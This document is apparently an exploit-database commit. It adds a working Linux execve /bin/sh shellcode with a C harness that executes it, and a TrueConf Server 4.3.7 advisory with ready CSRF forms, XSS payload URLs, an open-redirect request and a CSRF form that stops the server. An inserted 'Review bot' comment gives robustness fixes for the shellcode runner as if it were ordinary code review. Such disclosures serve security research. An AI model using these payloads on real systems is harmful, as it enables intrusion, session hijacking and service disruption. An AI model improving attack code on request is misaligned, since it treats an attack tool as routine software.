DB: 2017-01-30
2 new exploits Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes) TrueConf Server 4.3.7 - Multiple Vulnerabilities
This commit is contained in:
parent
2b017ecadf
commit
6df10a3616
3 changed files with 213 additions and 0 deletions
@ -15853,6 +15853,7 @@ id,file,description,date,author,platform,type,port
41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37114,3 +37115,4 @@ id,file,description,date,author,platform,type,port
41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0
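--- a/platforms/linux/shellcode/41183.c
+++ b/platforms/linux/shellcode/41183.c
@@ -0,0 +1,79 @@
+/**
+Copyright © 2017 Odzhan. All Rights Reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are
+met:
+
+1. Redistributions of source code must retain the above copyright
+notice, this list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright
+notice, this list of conditions and the following disclaimer in the
+documentation and/or other materials provided with the distribution.
+
+3. The name of the author may not be used to endorse or promote products
+derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
+IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
+INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
+ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGE. */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+
+#include <sys/mman.h>
+
+#define SHX_SIZE 37
+
+char SHX[] = {
+/* 0000 */ "\x31\xf6" /* xor esi, esi */
+/* 0002 */ "\xf7\xe6" /* mul esi */
+/* 0004 */ "\x52" /* push rdx */
+/* 0005 */ "\x52" /* push rdx */
+/* 0006 */ "\x52" /* push rdx */
+/* 0007 */ "\x54" /* push rsp */
+/* 0008 */ "\x5b" /* pop rbx */
+/* 0009 */ "\x53" /* push rbx */
+/* 000A */ "\x5f" /* pop rdi */
+/* 000B */ "\xc7\x07\x2f\x62\x69\x6e" /* mov dword [rdi], 0x6e69622f */
+/* 0011 */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */
+/* 0018 */ "\x40\x75\x04" /* jnz 0x1f */
+/* 001B */ "\xb0\x3b" /* mov al, 0x3b */
+/* 001D */ "\x0f\x05" /* syscall */
+/* 001F */ "\x31\xc9" /* xor ecx, ecx */
+/* 0021 */ "\xb0\x0b" /* mov al, 0xb */
+/* 0023 */ "\xcd\x80" /* int 0x80 */
+};
+
+void xcode(char *s, int len)
+{
+void *bin;
+
+bin=mmap (0, len,
+PROT_EXEC | PROT_WRITE | PROT_READ,
+MAP_ANON | MAP_PRIVATE, -1, 0);
+
+memcpy (bin, s, len);
+
+// execute
+((void(*)())bin)();
+
+munmap (bin, len);
+}
+
+int main(void)
+{
+xcode (SHX, SHX_SIZE);
+return 0;
+}
+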
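Review bot: `xcode()` never checks the result of the `bin=mmap (0, len, ...)` call, so on failure `MAP_FAILED` is handed straight to `memcpy` and then invoked through the function pointer; add `if (bin == MAP_FAILED) { perror("mmap"); return; }` before the copy. The trailing `munmap (bin, len);` is only reached if the copied code returns, which by the array's own comments (`mov al, 0x3b` / `syscall`, then `int 0x80`) it does not on a successful execve, so a comment such as `/* only reached if the syscall fails */` would make that explicit, and its return value is also unchecked. `len` is declared `int` while `mmap`, `memcpy` and `munmap` take `size_t`, so a negative value converts to a huge size; `size_t len` or a `len <= 0` guard would close that. `SHX_SIZE` is a hand-counted 37 next to a string-literal array; `sizeof SHX - 1` would keep the length in sync if the bytes are edited.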
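--- a/platforms/php/webapps/41184.txt
+++ b/platforms/php/webapps/41184.txt
@@ -0,0 +1,132 @@
+TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
+
+
+Vendor: TrueConf LLC
+Product web page: https://www.trueconf.com
+Affected version: 4.3.7.12255 and 4.3.7.12219
+
+Summary: TrueConf Server is a powerful, high-quality and highly secured
+video conferencing software server. It is specially designed to work with
+up to 250 participants in a multipoint conference over LAN or VPN networks.
+TrueConf Server requires no hardware and includes client applications for
+all popular platforms, making it an easy-to-set up, unified communications
+solution.
+
+Desc: The administration interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+Input passed via the 'redirect_url' GET parameter is not properly verified before
+being used to redirect users. This can be exploited to redirect a user to an
+arbitrary website e.g. when a user clicks a specially crafted link to the affected
+script hosted on a trusted domain.
+
+TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
+input passed via several parameters to several scripts is not properly sanitized
+before being returned to the user. This can be exploited to execute arbitrary HTML
+and script code in a user's browser session in context of an affected site.
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+Apache/2.4.17 (Win32)
+PHP/5.4.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2017-5393
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
+
+
+01.11.2016
+
+--
+
+
+CSRF Stored XSS:
+----------------
+
+<html>
+<body>
+<form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
+<input type="hidden" name="send_invite_mail" value="1" />
+<input type="hidden" name="invitation_type" value="-1" />
+<input type="hidden" name="hide_invitation_type" value="-1" />
+<input type="hidden" name="date" value="22.01.2017" />
+<input type="hidden" name="time-field" value="17:27" />
+<input type="hidden" name="time_zone" value="60" />
+<input type="hidden" name="subtype" value="3" />
+<input type="hidden" name="podiums" value="6" />
+<input type="hidden" name="cid" value="\c\dfa95f7e1d" />
+<input type="hidden" name="key" value="dfa95f7e1d" />
+<input type="hidden" name="topic" value="<script>alert('XSS')</script>" />
+<input type="hidden" name="description" value="" />
+<input type="hidden" name="owner" value="" />
+<input type="hidden" name="gconf-edit" value="ok" />
+<input type="hidden" name="webTtype" value="0" />
+<input type="submit" value="Submit form" />
+</form>
+</body>
+</html>
+
+
+
+Reflected XSS:
+--------------
+
+http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
+http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
+http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
+http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
+
+
+
+DOM XSS:
+--------
+
+http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
+http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
+
+
+
+Open Redirect:
+--------------
+
+Request:
+
+GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
+Host: 127.0.0.1:8888
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+
+Response:
+
+HTTP/1.1 302 Found
+Date: Thu, 22 Sep 2016 21:15:40 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: http://www.zeroscience.mk
+Content-Length: 0
+Keep-Alive: timeout=5, max=75
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+
+
+CSRF Stop Web Service:
+----------------------
+
+<html>
+<body>
+<form action="http://127.0.0.1/admin/service/stop/" method="POST">
+<input type="submit" value="Submit form" />
+</form>
+</body>
+</html>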